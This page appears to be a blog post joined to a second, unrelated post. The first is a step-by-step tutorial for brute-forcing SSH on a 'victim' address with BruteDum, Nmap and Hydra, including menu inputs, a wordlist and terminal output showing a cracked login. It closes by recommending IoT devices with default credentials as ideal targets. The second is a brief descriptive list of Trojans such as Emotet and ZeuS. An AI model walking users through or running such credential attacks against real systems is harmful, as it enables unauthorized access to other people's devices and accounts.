~/BruteDum$ python3 brutedum.py 888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum – Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author:
 https://GitHackTools.blogspot.com [?] Enter the victim address:
Step 2 
Enter the Target Address 
After the loading screen finishes, we\’ll need to enter the IP address of the victim. 
Once you\’ve done so, press Enter, and you\’ll be presented with the option to run an Nmap scan. 
It\’s a handy feature that can help you discover other services open on the same device.
 Type Y and hit Enter to run the Nmap scan.
[?] Enter the victim address: 192.168.43.1 [?] Do you want to scan victim\’s ports with Nmap? [Y/n]: Y
When the results return, you should be able to identify any ports that come back as \”open.\” 
Next, you\’ll need to select a service to crack. 
The menu for doing so is quite easy to understand, and you can choose one that matches the service that our Nmap scan discovered.
[+] Scanning ports with Nmap… Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT Nmap scan report for 192.168.43.1 Host is up (0.0087s latency).
 Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: ███.███.███.███.███.███ Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds [1] FTP [2] Telnet (Default port is 21) (Default port is 23) [3] PostgreSQL [4] SSH (Default port is 5432) (Default port is 22) [5] RDP [6] VNC (Default port is 3389) (Default port is 5900) [?] Which protocol do you want to crack? [1-6]: 4
In our example, we\’ll select option 4 and hit Enter to indicate we want to do SSH cracking.
 Step 3 
Select the Tool 
Now, we\’ll need to determine the tool we\’ll be using to try cracking the password.
 Depending on what service we selected, BruteDum will recommend one to use.
888888 888888 BRUTE 8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE 8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST 88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR 88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE 88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES [i] BruteDum – Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack Author: https://GitHackTools.blogspot.com [i] Target: 192.168.43.1 Protocol: ssh [1] Ncrack [2] Hydra (Recommended) [3] Medusa [?] Which tool do you want to use? [1-3]: 2
We\’ll select Hydra, as it\’s the one recommended for cracking SSH. Type 2 to indicate Hydra (or the number of the tool you wish to use) and press Enter to begin configuring it.
Step 4 
Set Username & Password Lists 
To launch our attack, we\’ll need to make a time versus probability tradeoff. 
Our first option will be to select a username list. 
That means we\’ll be trying every password in our password list with every username in our username list.
 It can become a lot of attempts very quickly.
In our example, we can select N to decline using a username list. 
Instead, we\’ll use a common username, or one we might know exists by default on the type of device.
[i] Target: 192.168.43.1 Protocol: ssh [?] Do you want to use username list? [Y/n]: N
Because we declined to supply a username list, we\’ll have to enter one manually instead.
 Here, I\’ll enter toor, as I know that\’s the username for our test device.
[?] Enter the username: toor
Next, we\’ll need to set the password list. 
It won\’t work if we select a password list outside of the directory we\’re in, so we can now add the password list we downloaded earlier. 
If you followed along before, we should be able to just paste in the Top207-probable-v2.txt wordlist here.
[?] Enter the path of wordlist: Top207-probable-v2.txt
Step 5 
Launch the Attack 
Finally, we can decide if we want to use the default port or not. 
Some devices may host services on a port other than the standard one, but this isn\’t very common. 
For SSH, the default port is 22, so we\’ll just enter Y and hit Enter.
[?] Do you want to use default port? [Y/n]: Y
If you\’re attacking a service on a non-standard port, you can specify it here and press Enter.
 Do not accidentally type in the number of the port you want to attack here, as the script will crash.
As soon as you supply the port, BruteDum will launch the tool you specified.
[i] Target: 192.168.43.1 Protocol: ssh [+] Hydra is cracking… Hydra v8.8 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes. 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task [DATA] attacking ssh://192.168.43.1:22/
After some time to attack the network and try all of the passwords, you\’ll get a result, either revealing the password or reporting that a valid password was not found.
[22][ssh] host: 192.168.43.1 login: toor password: root 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18 [?] Do you want to conitnue? [Y/n]: N
Brute-Force Attacks Find Weak Passwords 
A key thing to remember about brute-force and dictionary attacks is that they are powerful in the right place, but not a silver bullet for breaking into accounts. 
Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. 
That issue necessitates prolonged contact with the victim to burn through those longer lists, making the attack less practical and more evident to anyone watching for this kind of attack.
An ideal target for these attacks is primarily IoT devices, which generally have poor security and a plethora of services running with default credentials.
That\’s it I hope u loved the TUTORIAL and enjoyed learning.
Any doubts/probelms then contact me
I am here to help u all..
Keep sharing and Supporting.
Love u all…❤️❤️
Uncategorized

Examples Of Trojan

 Examples Of Trojan 
━━━━━━━━━━━━━ 
Examples of Trojan malware attacks
Trojan malware attacks can inflict a lot of damage. At the same time, Trojans continue to evolve. Here are three examples.
1⃣ Emotet banking Trojan : After a long hiatus, Emotet’s activity increased in the last few months of 2017, according to the Symantec 2018 Internet Security Threat Report. Detections increased by 2,000 percent in that period. Emotet steals financial information, among other things.
2⃣ Rakhni Trojan : This malware has been around since 2013. More recently, it can deliver ransomware or a cryptojacker (allowing criminals to use your device to mine for cryptocurrency) to infected computers. “The growth in coin mining in the final months of 2017 was immense,” the 2018 Internet Security Threat Report notes. “Overall coin-mining activity increased by 34,000 percent over the course of the year.”
3⃣ ZeuS/Zbot : This banking Trojan is another oldie but baddie. ZeuS/Zbot source code was first released in 2011. It uses keystroke logging — recording your keystrokes as you log into your bank account, for instance — to steal your credentials and perhaps your account balance as well.
━━━━━━━━━━━━━